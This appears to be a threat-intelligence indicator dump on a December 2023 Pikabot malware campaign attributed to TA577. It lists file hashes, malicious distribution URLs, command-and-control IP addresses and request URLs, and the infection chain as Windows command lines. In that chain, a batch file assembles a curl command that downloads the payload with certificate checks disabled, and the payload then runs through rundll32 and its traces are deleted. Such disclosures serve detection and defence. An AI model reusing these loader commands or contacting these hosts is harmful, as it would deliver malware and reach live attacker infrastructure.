18.12.2023 | Pikabot | TA577 | 1.1.17-ghost

*************************************************

.url https://megacell.pe/lmrdp/
.zip 706869a2ecba309e9985b31f795fc592b0e7f54dd787b3e90b04bb70db4fac27
.dll 294644f81aca69b6cc734500b07a2e0ed1129aa5ee370785daae520961fe77c0

*************************************************

url > zip > js > curl > .dll

wscript.exe C:\Users\Admin\AppData\Local\Temp\Notezs.js

cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Notezs.js

cmd.exe /c echo|set /p=cu > C:\Users\Admin\AppData\Local\Temp\dolorum.r.bat

cmd.exe /S /D /c echo

cmd.exe /S /D /c" set /p="cu" 1>"C:\Users\Admin\AppData\Local\Temp\dolorum.r.bat""

cmd.exe /c echo rl "https://buildmateindia.com/yPS3F6/980141599" --output "C:\Users\Admin\AppData\Local\Temp\tenetur.w" --ssl-no-revoke --insecure --location >> "C:\Users\Admin\AppData\Local\Temp\dolorum.r.bat"

cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dolorum.r.bat"

curl "https://buildmateindia.com/yPS3F6/980141599" --output "C:\Users\Admin\AppData\Local\Temp\tenetur.w" --ssl-no-revoke --insecure --location 

cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\dolorum.r.bat

cmd.exe /c ren "C:\Users\Admin\AppData\Local\Temp\tenetur.w" error.p

rundll32.exe C:\Users\Admin\AppData\Local\Temp\error.p Enter

*************************************************

**** .dll distro ****

https://shakyastatuestrade.com/IhA6F/682689821
https://buildmateindia.com/yPS3F6/980141599

*************************************************

c2's

45.56.71.218:13724
51.161.81.190:13721
45.76.96.172:2223
78.141.200.111:5938
149.28.100.66:5243
154.221.30.136:13724
154.211.12.126:2967
172.232.54.192:2224
65.20.85.39:2967
172.232.189.166:1194

https://45.56.71.218:13724/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://51.161.81.190:13721/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://45.76.96.172:2223/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://78.141.200.111:5938/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://149.28.100.66:5243/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://154.221.30.136:13724/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://154.211.12.126:2967/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://172.232.54.192:2224/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://65.20.85.39:2967/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://172.232.189.166:1194/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker

*************************************************